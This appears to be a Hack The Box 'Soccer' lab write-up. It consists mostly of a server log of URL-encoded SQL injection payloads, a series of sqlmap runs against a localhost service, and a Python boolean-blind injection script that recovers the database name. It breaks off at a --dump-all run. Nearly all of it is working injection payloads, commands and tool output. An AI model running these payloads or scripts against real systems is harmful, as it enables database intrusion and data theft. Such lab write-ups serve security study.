127.0.0.1 - - [05/Mar/2023 11:41:00] "GET /?id=1%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20pXHb HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:08] "GET /?id=1%27%29%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27CJRP%27%3D%27CJRP HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:13] "GET /?id=1%27%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27Jjgq%27%3D%27Jjgq HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:18] "GET /?id=1%29%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%287785%3D7785 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:21] "GET /?id=1%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:25] "GET /?id=1%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--%20nGvp HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:29] "GET /?id=1%27%29%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27fmfX%27%3D%27fmfX HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:32] "GET /?id=1%27%20AND%204511%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284511%3D4511%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%27wOSp%27%3D%27wOSp HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:35] "GET /?id=1%29%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%288326%3D8326 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:44] "GET /?id=1%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:49] "GET /?id=1%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20iGwg HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:53] "GET /?id=1%27%29%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27XKdT%27%3D%27XKdT HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:41:58] "GET /?id=1%27%20AND%201250%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281250%3D1250%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27QHru%27%3D%27QHru HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:04] "GET /?id=%28SELECT%20CONCAT%28CONCAT%28%27qkbzq%27%2C%28CASE%20WHEN%20%288028%3D8028%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qqjjq%27%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:09] "GET /?id=1 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:13] "GET /?id=1%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:22] "GET /?id=1%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:28] "GET /?id=1%27%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:32] "GET /?id=1%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:36] "GET /?id=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:40] "GET /?id=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:44] "GET /?id=1%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:49] "GET /?id=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:42:58] "GET /?id=1%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:04] "GET /?id=1%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:09] "GET /?id=1%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:16] "GET /?id=1%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2876%29%7C%7CCHR%2877%29%7C%7CCHR%28105%29%7C%7CCHR%28113%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:20] "GET /?id=1%29%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%284161%3D4161 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:30] "GET /?id=1%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:39] "GET /?id=1%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29--%20pyzB HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:47] "GET /?id=1%27%29%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%28%27awGX%27%3D%27awGX HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:51] "GET /?id=1%27%20AND%20%28SELECT%203123%20FROM%20%28SELECT%28SLEEP%285%29%29%29dZPR%29%20AND%20%27MsuW%27%3D%27MsuW HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:54] "GET /?id=1%29%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%283450%3D3450 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:43:58] "GET /?id=1%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:05] "GET /?id=1%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29--%20aLXw HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:09] "GET /?id=1%27%29%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27pHJg%27%3D%27pHJg HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:13] "GET /?id=1%27%20AND%206928%3D%28SELECT%206928%20FROM%20PG_SLEEP%285%29%29%20AND%20%27sugF%27%3D%27sugF HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:17] "GET /?id=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%282874%3D2874 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:21] "GET /?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:25] "GET /?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20LcPO HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:29] "GET /?id=1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27Fvna%27%3D%27Fvna HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:33] "GET /?id=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27AxHq%27%3D%27AxHq HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:37] "GET /?id=1%29%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%283643%3D3643 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:44] "GET /?id=1%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:48] "GET /?id=1%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29--%20uMol HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:52] "GET /?id=1%27%29%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%28%27GqHt%27%3D%27GqHt HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:44:56] "GET /?id=1%27%20AND%202581%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2884%29%7C%7CCHR%28112%29%7C%7CCHR%2866%29%2C5%29%20AND%20%27vniL%27%3D%27vniL HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:18] "GET /?id=1%29%20ORDER%20BY%201--%20eAYw HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:23] "GET /?id=1%29%20ORDER%20BY%204299--%20HCGh HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:35] "GET /?id=1%20ORDER%20BY%201--%20uOLG HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:46:58] "GET /?id=1%20ORDER%20BY%205403--%20kRXS HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:12] "GET /?id=1%20ORDER%20BY%201--%20viPb HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:24] "GET /?id=1%20ORDER%20BY%201950--%20hLcp HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:28] "GET /?id=1%27%29%20ORDER%20BY%201--%20CevJ HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:32] "GET /?id=1%27%29%20ORDER%20BY%204026--%20LUYc HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:47:36] "GET /?id=1%27%20ORDER%20BY%201--%20SMzk HTTP/1.1" 200 -
try op by hand
for this i try sqlmap manymany times,but i can’t get the data
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B
___
__H__
___ ___[.]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:49:15 /2023-03-19/
[12:49:15] [INFO] testing connection to the target URL
[12:49:20] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[12:49:20] [INFO] testing if the target URL content is stable
[12:49:24] [INFO] target URL content is stable
[12:49:27] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[12:49:30] [INFO] testing for SQL injection on GET parameter 'id'
[12:49:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:49:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:49:53] [WARNING] GET parameter 'id' does not seem to be injectable
[12:49:53] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 12:49:53 /2023-03-19/
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --level 5
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:50:02 /2023-03-19/
[12:50:02] [INFO] testing connection to the target URL
[12:50:05] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[12:50:05] [INFO] testing if the target URL content is stable
[12:50:08] [INFO] target URL content is stable
[12:50:12] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[12:50:15] [INFO] testing for SQL injection on GET parameter 'id'
[12:50:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:50:41] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit
[12:50:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[12:50:50] [WARNING] user aborted during detection phase
quit
[12:50:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[12:50:59] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit
[12:51:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:51:02] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] S
[12:51:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[12:51:05] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
[12:51:06] [ERROR] user quit
[*] ending @ 12:51:06 /2023-03-19
so i try python bool blind injection
# -*- coding: utf-8 -*-
import requests
import string
url = "http://localhost:8081?id=1"
#mark = "Ticket Exists"
notmark="Doesn't"
mark="Ticket Exists"
database = ''
for i in range(1, 25):
for j in string.ascii_letters:
target = url + ' '+' or if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables)) --;' % (i, j)
r = requests.get(target)
if notmark not in r.text:
database += j
print(database)
print(r.text)
break
print('Database:', database)
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ python3 bool4soc\ copy.py 1 ⨯
s
Ticket Exists
so
Ticket Exists
soc
Ticket Exists
socc
Ticket Exists
socce
Ticket Exists
soccer
Ticket Exists
soccerd
Ticket Exists
soccerdb
Ticket Exists
These results make me confident that i can sqlmap it
so i try the command
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists"
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:24:33 /2023-03-19/
[13:24:33] [INFO] testing connection to the target URL
[13:24:39] [INFO] testing if the provided string is within the target URL page content
[13:24:39] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:24:39] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[13:24:43] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[13:24:46] [INFO] testing for SQL injection on GET parameter 'id'
[13:24:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:25:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[13:25:47] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[13:27:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] n
[13:35:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[13:35:36] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6478 OR 1585=1585
---
[13:36:30] [INFO] testing MySQL
[13:36:36] [INFO] confirming MySQL
[13:36:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[13:37:00] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'
[*] ending @ 13:37:00 /2023-03-19/
continue to try it is too slow
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists"
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:24:33 /2023-03-19/
[13:24:33] [INFO] testing connection to the target URL
[13:24:39] [INFO] testing if the provided string is within the target URL page content
[13:24:39] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:24:39] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
[13:24:43] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[13:24:46] [INFO] testing for SQL injection on GET parameter 'id'
[13:24:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:25:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[13:25:47] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[13:27:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] n
[13:35:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[13:35:36] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6478 OR 1585=1585
---
[13:36:30] [INFO] testing MySQL
[13:36:36] [INFO] confirming MySQL
[13:36:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[13:37:00] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'
[*] ending @ 13:37:00 /2023-03-19/
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:40:04 /2023-03-19/
[13:40:04] [INFO] resuming back-end DBMS 'mysql'
[13:40:04] [INFO] testing connection to the target URL
[13:40:07] [INFO] testing if the provided string is within the target URL page content
[13:40:07] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:40:07] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6478 OR 1585=1585
---
[13:40:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[13:40:07] [INFO] fetching database names
[13:40:07] [INFO] fetching number of databases
[13:40:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:40:14] [INFO] retrieved: 5
[13:40:40] [INFO] retrieved: mys^C
[*] ending @ 13:42:09 /2023-03-19/
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" -D soccerdb --tables
___
__H__
___ ___[)]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:42:22 /2023-03-19/
[13:42:22] [INFO] resuming back-end DBMS 'mysql'
[13:42:22] [INFO] testing connection to the target URL
[13:42:25] [INFO] testing if the provided string is within the target URL page content
[13:42:25] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:42:25] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6478 OR 1585=1585
---
[13:42:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[13:42:25] [INFO] fetching tables for database: 'soccerdb'
[13:42:25] [INFO] fetching number of tables for database 'soccerdb'
[13:42:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:42:28] [INFO] retrieved: 0
[13:42:56] [WARNING] database 'soccerdb' appears to be empty
[13:42:56] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
which common tables (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-tables.txt' (press Enter)
[2] custom
>
[13:43:06] [INFO] performing table existence using items from '/usr/share/sqlmap/data/txt/common-tables.txt'
[13:43:06] [INFO] adding words used on web page to the check list
[13:43:06] [INFO] checking database 'soccerdb'
please enter number of threads? [Enter for 1 (current)]
[13:43:11] [WARNING] running in a single-thread mode. This could take a while
[13:43:27] [WARNING] no table(s) found for database 'soccerdb'
No tables found
[13:43:27] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'
[*] ending @ 13:43:27 /2023-03-19/
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" --dump-all
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
